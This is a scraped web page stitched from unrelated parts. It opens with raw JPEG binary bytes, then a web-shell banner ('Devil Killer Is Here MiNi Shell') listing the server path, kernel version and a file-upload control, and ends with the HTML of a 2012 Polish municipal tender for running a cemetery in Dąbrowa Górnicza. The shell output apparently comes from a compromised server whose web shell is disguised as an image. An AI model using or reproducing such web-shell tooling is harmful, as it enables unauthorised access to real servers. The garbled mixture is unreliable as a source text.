JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120112/10888-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zarządzanie cmentarzem komunalnym w Dąbrowie Górniczej przy  ul. Królewskiej ( w dzielnicy Tucznawa) i świadczenie usług grzebalnych dla ludności</b><br>
<b>Numer ogłoszenia: 10888 - 2012; data zamieszczenia: 12.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie cmentarzem komunalnym w Dąbrowie Górniczej przy  ul. Królewskiej ( w dzielnicy Tucznawa) i świadczenie usług grzebalnych dla ludności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia  poniżej 200.000,00 EUR.  na podstawie Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2010r. Nr 113 poz. 759 z późn. zm.)o wartości zamówienia poniżej 200.000,00 EUR.
Przedmiotem  zamówienia   jest  administrowanie   cmentarzem   komunalnym  w   Dąbrowie   Górniczej   przy   ul.   Królewskiej (w dzielnicy Tucznawa) i    świadczenie   usług   grzebalnych dla ludności.
I.	W zakres prac wchodzi:
1.	Świadczenie usług    grzebalnych  dla   ludności.
Wykonawca zapewni kontrahentom, jeśli taka jest ich wola zorganizowanie na cmentarzu ceremonii pogrzebowej zgodnie z obowiązującymi aktami prawnymi:
a)  ustawą  z  dnia   31.01.1959   r.   o   cmentarzach    i    chowaniu   zmarłych (Dz .  U.   nr   23, poz. 295 z 2000 r.   wraz   z    późniejszymi    zmianami),
       b)  Zarządzeniem  nr  58.2011  z   dnia    18.01.2011   r.  Prezydenta Miasta Dąbrowy  Górniczej  w  sprawie      
       ustalenia wysokości opłat za usługi grzebalne na     cmentarzach     komunalnych    w      Dąbrowie    Górniczej
       (ul. Zaplecze, dzielnica  Tucznawa, dzielnica Okradzionów) - stanowiący załącznik  do projektu umowy.
c)  Rozporządzeniem   Ministra   Infrastruktury  w sprawie wymagań, jakie muszą spełniać   cmentarze, groby  i    inne   miejsca    pochówku  zwłok i  szczątków (Dz. U. nr 48, poz. 284  z 2008 r.).
		  d) Rozporządzeniem   Ministra   Spraw   Wewnętrznych i Administracji w sprawie sposobu prowadzenia   			      ewidencji   grobów -  Dz. U. nr 90 poz. 1013 z 2001 r. wraz z późn.zm.)
     		e) ustawą z dnia 31.01.1959 r. o cmentarzach i chowaniu zmarłych (Dz. U.z 2000r. poz.295  z późn. zm.) oraz  
   		     do przepisów prawa budowlanego.

2. Cmentarz jest cmentarzem komunalnym wobec czego uroczystości oraz ceremonie pogrzebowe mogą odbywać się wg tradycji świeckiej oraz wg dowolnej tradycji religijnej, którą da się zorganizować ze względów technicznych i organizacyjnych na cmentarzu. Uprzywilejowanie jakiekolwiek tradycji i ceremonii jest niedopuszczalne i stanowić będzie podstawę do rozwiązania umowy z winy Wykonawcy.

       3. Wykonywanie pochówków odbywać się będzie zgodnie z planem   zagospodarowania cmentarza.

       4.  Prowadzenie wszelkiej dokumentacji  wymaganej obowiązującymi przepisami (Rozporządzenie   Ministra   Spraw   
            Wewnętrznych i Administracji w sprawie sposobu prowadzenia   ewidencji   grobów -  Dz. U. nr 90 poz. 1013 z 
             2001 r. wraz z późniejszymi zmianami)  w tym :
       -      ksiąg cmentarnych,
-	księgi ekshumacji zwłok,
-	kart zgonu,
-	zezwoleń,
-	zaświadczeń,
-	decyzji o ekshumacji zwłok,
-	ewidencji miejsc grzebalnych.
-	
5. Prowadzenie dokumentacji finansowo-rzeczowej (księgowość) dotyczącej przedmiotowego zamówienia. Brak   takiej     dokumentacji, istotne    błędy   w    jej   prowadzeniu   lub   utrudnianie w  udostępnianiu   jej Zamawiającemu w celu skontrolowania prawidłowości rozliczeń  z Wykonawcą  i  kontroli  jego    faktycznych   przychodów, spowoduje    rozwiązanie umowy z winy Wykonawcy.

     6. Utrzymanie w należytym stanie mogił osób pochowanych z opieki społecznej tj. koszenie trawy i usuwanie    
         samosiejek z mogił oraz oznaczanie grobów tabliczkami i krzyżami

     7. Wykonawca na bieżąco dba o utrzymanie porządku i czystości na terenie całego cmentarza oraz terenie przyległym w odległości 2 m  od ogrodzenia oraz drogi dojazdowej i parkingu
    
a) w okresie letnim wykona:
koszenie trawy, samosiejek, chwastów  na terenie całego cmentarza oraz terenie przyległym tak aby utrzymywać trawę na poziomie do 10 cm w sposób ciągły. Po wykoszeniu Wykonawca uporządkuje teren całego cmentarza tzn. zgrabi trawę, zbierze zanieczyszczenia, załaduje 
i wywiezie do miejsca unieszkodliwienia wszystkie wytworzone odpady wraz  z  uiszczeniem opłaty  za  ich   utylizację.
sprzątanie (zbieranie zanieczyszczeń i odpadów na terenie całego cmentarza), zamiatanie alejek, usuwanie chwastów i samosiejek na alejkach z kostki brukowej.
	bieżące opróżnianie kontenera na odpady ( tj. w sposób nie powodujący ich przepełnienia)

 b) w okresie zimowym:
na  alejkach,   na  parkingu , na drodze dojazdowej do cmentarza oraz przed budynkiem administracyjnym należy systematycznie wykonywać odśnieżanie oraz niwelowanie śliskości nawierzchni
 bieżące opróżnianie kontenera na odpady ( tj. w sposób nie powodujący ich przepełnienia)

8.	 Utrzymanie w   należytym   porządku  i   czystości   wszystkich    pomieszczeń  znajdujących  się na  terenie  cmentarza  

9.	Wykonawca  ma obowiązek użytkować cmentarz zgodnie z jego przeznaczeniem i wymaganiami ochrony środowiska oraz utrzymać go we właściwym stanie technicznym, sanitarnym i estetycznym.

10.	Na terenie cmentarza oraz w odległości 2 m od ogrodzenia, drogi dojazdowej i parkingów Zamawiający zabrania Wykonawcy ustawiania wszelkich reklam, billboardów, banerów.

11.	Wykonawca ponosi wszelkie koszty z tytułu korzystania z energii elektrycznej, wody, opróżniania szamba, wywożenia wszelkich odpadów i nieczystości. Wykonawca zobowiązany jest do zawarcia odrębnych umów na wywóz odpadów z firmą posiadającą stosowne zezwolenia. Kopie zawartych umów Wykonawca składa najpóźniej  w  ciągu 1 tygodnia od dnia zawarcia umowy. W przypadku posiadania przez Wykonawcę zezwolenia na wywóz odpadów nie musi on zawierać odrębnej umowy.

12.	Wykonawca ponosi pełna odpowiedzialność cywilną za szkody powstałe wobec osób trzecich, które wynikną na skutek nieprawidłowego wykonywania przedmiotu zamówienia.

13.	Wykonawca ponosi wszelką odpowiedzialność za powierzone mu przez Zamawiającego ruchomości jak i nieruchomości znajdujące się na terenie cmentarza, przy czym przy wystąpieniu szkód będących wynikiem kradzieży bądź dewastacji przedmiotowego  majątku pokrywa ich usunięcie ze środków własnych.
14.	Wykonawca ubezpieczy powierzone mu w administrowanie mienie od ognia, kradzieży dewastacji na kwotę min.8.500,00 zł, z cesją praw na właściciela obiektu tj. Gminę Dąbrowa Górnicza. Powyższa polisa obowiązuje od pierwszego dnia przedmiotowej umowy i będzie nieprzerwalnie kontynuowana do końca trwania umowy. Kopie polisy Wykonawca przedkłada Zamawiającemu w terminie 7 dni od jej zawarcia.

15.	 Dla zabezpieczenia ewentualnych roszczeń osób trzecich Wykonawca winien posiadać ubezpieczenie OC od prowadzonej działalności (administrowania) na kwotę minimum 50.000,00 zł nieprzerywalnie przez cały okres obowiązywania umowy. Wykonawca przedkłada potwierdzoną za zgodność z oryginałem kopię posiadanej polisy OC najpóźniej w pierwszym dniu obowiązywania umowy. Kopie później zawieranych polis Wykonawca przedkłada Zamawiającemu w terminie 7 dni od daty zawarcia umowy ubezpieczenia OC.

16.	 Wykonawca przekazuje na rzecz Zamawiającego 100 % pobranych opłat za usługi grzebalne ( zgodnie z Zarządzeniem nr 58.2011-stanowiącym załącznik Nr 1 do projektu umowy). Natomiast Zamawiający przekazuje na rzecz Wykonawcy określoną % w ofercie kwotę za usługi grzebalne. Opłaty za wykonanie usług grzebalnych Wykonawca pobiera na podstawie faktury VAT/rachunku, zgodnie z cenami wyszczególnionymi w Zarządzeniu nr 58.2011 Prezydenta Miasta z dnia 18.01.2011 r. w sprawie ustalenia wysokości opłat za usługi grzebalne na cmentarzach komunalnych w Dąbrowie Górniczej (ul. Zaplecze, Tucznawa, Okradzionów )stanowiącym załącznik nr 1 do projektu umowy.

17.	W przypadku zmiany opłat w Zarządzeniu nr 58.2011 Prezydenta Miasta z dnia 18.01.2011 r. Wykonawcy przysługuje w terminie 1 miesiąca od dnia powiadomienia o tym fakcie prawo do wypowiedzenia zawartej na administrowanie cmentarzem umowy. Rozwiązanie umowy nastąpi po upływie 3 miesięcznego okresu wypowiedzenia.

18.	Zamawiający wyraża zgodę na przygotowanie przez Wykonawcę wyprzedzająco do pięciu studzienek pochówkowych.

19.	Wszystkie rezerwacje miejsc pochówkowych opłacane u poprzednich  zarządców przed podpisaniem niniejszej umowy pozostają aktualne w czasie jej obowiązywania.

20.	Wykonawca zobowiązany jest stosować się do przepisów ustawy z dnia 31.01.1959 r. o cmentarzach i chowaniu zmarłych ( Dz. U., poz.295 z 2000 r. wraz z późn. Zmianami.) oraz do przepisów prawa budowlanego.

21.	Wykonawca wykonuje konieczne, drobne naprawy powierzonego majątku, które zaistnieją w okresie związania z przedmiotową umową polegające miedzy innymi na wymianie klamki, uszkodzonej szyby, zamka, a także maluje oraz naprawia zniszczone, zdewastowane i skorodowane elementy ogrodzenia.

22.	Wykonawca zobowiązany jest umieścić w widocznym miejscu na tablicy ogłoszeń obowiązującego cennika usług oraz informację o Wykonawcy (administratorze cmentarza), ( adres, numer telefonu) oraz godziny jego urzędowania.
              II. Dodatkowe informacje dla Wykonawców:
1.	Powierzchnia cmentarza wynosi 1,0 ha. 
2.	Na terenie cmentarza znajduje się 
budynek gospodarczy o powierzchni 20 m2 zbudowany z bloczków gazobetonowych, kryty papą termozgrzewalną 
	dom przedpogrzebowy o powierzchni 20 m2 zbudowany z cegły, kryty papą z drewnianą stolarką okienną, wyposażony w piece akumulacyjne.
	dwie alejki o nawierzchni wykonanej z kostki brukowej o obrzeżach betonowych o powierzchni 277,50 m 2
	parking asfaltowy o powierzchni 240 m 2
3.	Cmentarz jest ogrodzony od strony półn. - zach.  oraz połud.- wsch. siatką metalową ułożoną na słupkach metalowych.  Ponadto od strony wschodniej przy narożu ogrodzenia od strony północnej zamontowana jest brama wjazdowa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 98.37.11.11-5, 98.37.11.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonał lub wykonuje min. 1 usługę polegającą na zarządzaniu cmentarzem komunalnym o wartości min. 40 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje min.1 osobę posiadającą uprawnienia do zarządzania nieruchomościami zgodnie z art. 184 ustawy z dnia 21 sierpnia 1997 roku o gospodarce nieruchomościami ( tekst jednolity Dz.U. z 2010 nr 102 poz. 651)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I.Pełnomocnictwo do reprezentowania:
 1)  wymagane w przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których   uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
2)  wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
II. zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b Ustawy , które  musi zawierać minimum: 
1.	dane pozwalające na identyfikacje stron 
2.	zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych  do wykonania zamówienia i sytuacji  finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o współpracy, porozumienie o delegowaniu pracowników, umowa o świadczenie  usług doradczych, know-how i inne umowy nienazwane) 
3.	cel i czas udostępnienia (obejmujący okres realizacji zamówienia)
III. potwierdzenie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w zakresie:
1.	 siły wyższej  co oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się
 z umowy w jej obecnym brzmieniu;
2.	zmiany cennika opłat za usługi grzebalne;
3.	zmiany kluczowego personelu Wykonawcy bądź Zamawiającego;
        4.    zmian przepisów prawa istotnych dla zawartej umowy.
5. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn,              o których mowa w pkt. 25.4. SIWZ, Wykonawca zobowiązany jest do niezwłocznego poinformowania             o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
6.Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 
podpisany przez obie strony.
7.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
8. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bib.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej					
41-300 Dąbrowa Górnicza
ul. Graniczna 21 
Wydział Gospodarki Mieszkaniowej i Komunalnej, III piętro, pokój nr 314.</p>
